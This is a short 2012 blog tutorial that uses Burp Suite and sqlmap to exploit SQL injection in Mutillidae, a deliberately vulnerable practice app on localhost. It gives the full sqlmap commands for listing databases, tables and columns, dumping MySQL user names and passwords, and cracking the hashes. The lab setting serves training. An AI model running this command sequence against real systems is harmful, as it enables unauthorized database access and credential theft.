Comments

Pages

Saturday, 15 September 2012

Extract Data from Database Server via SQL Injection with SQL Map

Posted by at 07:02 Read our previous post
Mutillidae have a bug for SQL Injection, so I will use  this bug for extracting data from database.
Now open your burp suite and open Mutillidae from your browser.
http://localhost/mutillidae/index.php?page=login.php
Enter a random Name and Password. Burp Suite will capture all data in Mutillidae look like this,
The data you needed is data in the red line. Copy this data, and open your SQL Map.
enter this command :
./sqlmap.py -u "http://localhost/mutillidae/index.php?page=login.php" --data "username=jack&password=parodi&login-php-submit-button=Login" --dbs

The blue string is a data from burp suite. Press enter and you will see the database.
I want to see the tables on database mysql, so run this command:
./sqlmap.py -u "http://localhost/mutillidae/index.php?page=login.php" --data "username=jack&password=parodi&login-php-submit-button=Login" -D "mysql" --tables
The blue string is a database what you want to open.

Now I will see the user column from database mysql. Simply run this command:
./sqlmap.py -u "http://localhost/mutillidae/index.php?page=login.php" --data "username=jack&password=parodi&login-php-submit-button=Login" -D "mysql" -T "user" --columns


The blue string is a column name.

Now I will see the value of user column and value of user password from database mysql. Simply run this command:
./sqlmap.py -u "http://localhost/mutillidae/index.php?page=login.php" --data "username=jack&password=parodi&login-php-submit-button=Login" -D "mysql" -T "user" -C "user" --dump

./sqlmap.py -u "http://localhost/mutillidae/index.php?page=login.php" --data "username=jack&password=parodi&login-php-submit-button=Login" -D "mysql" -T "user" -C "password" --dump
After running the command above, SQL Map automated to crack the hash password of mysql. When the prompt to crack hash mysql appear, please answer Y and press enter.


Ok, we Got the Data (username,password) MySQL

No comments:

Post a Comment

©2012 SECURITY is powered by Blogger - Template designed by Stramaxon - Best SEO Template